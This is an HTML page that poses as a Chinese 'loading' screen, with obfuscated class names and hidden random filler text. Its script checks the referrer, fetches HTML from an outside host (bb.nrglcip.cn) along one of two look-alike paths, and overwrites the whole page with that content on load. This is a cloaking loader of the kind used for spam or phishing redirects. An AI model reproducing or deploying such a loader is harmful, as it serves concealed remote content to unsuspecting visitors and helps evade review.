<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .L0ukJHA {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .L0ukJHA .SQ6AUw7AfZn {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .L0ukJHA .content {
            line-height: 50px;
            text-align: center
        }

        .L0ukJHA .img {
            width: 100%
        }

        .L0ukJHA .ed94lxA {
            text-align: center
        }

        .L0ukJHA .ed94lxA span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .L0ukJHA .ed94lxA span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .L0ukJHA .ed94lxA span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .L0ukJHA .ed94lxA span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .L0ukJHA .ed94lxA span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .L0ukJHA .ed94lxA span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .L0ukJHA .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function sUj3rOD36Ty(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var nv8utS = sUj3rOD36Ty('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ nv8utS +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ nv8utS +".html?a=share";
		}
		
        B65yCMk=url+"#"+new Date().getTime();
        B65yCMk && function() {
            $.get(B65yCMk, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>asOmfbSzNt0M7Nhl0GdcJEN</span>
<h1 style='display:none' >iAaKAPxV7PIUyf0</h1>
<div style='display:none'>U77VfbwTFVjceuTNbBwC1zUdAfa2JzAw74Vl9ZI44FEb</div>
<h1 style='display:none' >iAaKAPxV7PIUyf0</h1>
<p  style='display:none'>EzqCi2BLQPxFEEI4Lr2ayDHIljfybTPXouhnakkstJdSMzaz2N5Gf7VOpse0lgiTMffuhkHyDgTqbl</p>
<b style='display:none' >KzWGSaD1eiGs9rojmyQKv8VG0gDGtyO1DevoLLvLg</b>
<img  src='' style='display:none'>
<span style='display:none'>asOmfbSzNt0M7Nhl0GdcJEN</span>
<img  src='' style='display:none'><div class="L0ukJHA">
    <div class="SQ6AUw7AfZn">
        <div class="ed94lxA">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >s7MtbGCyhGQ8QVKVdH7CYdhPvEsxuHZWIkPgUdblC</b>
<b style='display:none' >s7MtbGCyhGQ8QVKVdH7CYdhPvEsxuHZWIkPgUdblC</b>
<img  src='' style='display:none'>
<b style='display:none' >s7MtbGCyhGQ8QVKVdH7CYdhPvEsxuHZWIkPgUdblC</b></body>
</html>